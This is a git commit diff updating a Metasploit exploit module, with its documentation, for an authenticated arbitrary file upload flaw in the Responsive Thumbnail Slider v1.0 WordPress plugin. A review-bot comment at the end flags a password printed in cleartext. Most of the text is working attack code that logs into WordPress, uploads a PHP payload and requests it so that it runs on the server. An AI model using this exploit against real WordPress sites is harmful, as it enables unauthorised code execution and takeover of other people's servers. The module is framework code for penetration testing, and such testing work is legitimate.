Update module and its documentation

Wei Chen 2018-07-26 23:08:20 -05:00
parent be1bf8b1fc
commit 72d634b10b
2 changed files with 59 additions and 55 deletions


@ -1,13 +1,16 @@
## Vulnerable Application ## Vulnerable Application
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
v1.0 for WordPress post authentication.
For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).
## Verification Steps ## Verification Steps
1. Install the application 1. Install the application
2. Start msfconsole 2. Start msfconsole
3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]``` 3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
4. Do: ```set RHOSTS [IP]``` 4. Do: ```set RHOSTS [IP]```
5. Do: ```set TARGETURI [URI]``` 5. Do: ```set TARGETURI [URI]```
6. Do: ```set USERNAME [USERNAME]``` 6. Do: ```set USERNAME [USERNAME]```


@ -4,21 +4,24 @@
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE include Msf::Exploit::PhpEXE
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{ 'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Arash Khazaei', # EDB PoC 'Author' =>
'Shelby Pace' # Metasploit Module [
], 'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' => 'References' =>
[ [
[ 'EDB', '37998' ] [ 'EDB', '37998' ]
@ -29,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
[ [
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ] [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
], ],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Aug 28 2015", 'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -40,12 +39,42 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ]) OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
]) ])
end end
def check def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end
def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end
nil
end
def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
res = send_request_cgi( res = send_request_cgi(
@ -53,51 +82,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => plugin_uri 'uri' => plugin_uri
) )
unless res && res.code == 200 if res && res.code == 200
return Exploit::CheckCode::Safe vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
return CheckCode::Detected
end end
Exploit::CheckCode::Detected nil
end end
def login def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php') auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
res = send_request_cgi( return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
'method' => 'GET',
'uri' => wp_uri
)
if res && res.body.include?("WordPress") && res.code == 200 store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/') print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
cookies = res.get_cookies auth_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
end end
def upload_payload(cookies) def upload_payload(cookies)
@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload") print_good("Successful upload")
execute = send_request_raw( send_request_cgi(
'uri' => file_uri, 'uri' => file_uri,
'method' => 'GET', 'method' => 'GET',
'cookie' => cookies 'cookie' => cookies
@ -151,8 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
unless check == Exploit::CheckCode::Safe unless check == CheckCode::Safe
login auth_cookies = login
upload_payload(auth_cookies)
end end
end end
end end
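Review bot: The new `login` writes the cleartext password to the console with `print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")`, so the secret also lands in any spooled or logged session output. The line just above already passes the credential to `store_valid_credential`, so the status message only needs the account name, for example `print_good("Logged into WordPress as #{datastore['WPUSERNAME']}")`. Separately, the documentation section of this commit still shows `set USERNAME [USERNAME]` on its new side, while the option registered here is now `WPUSERNAME`, so that verification step looks stale.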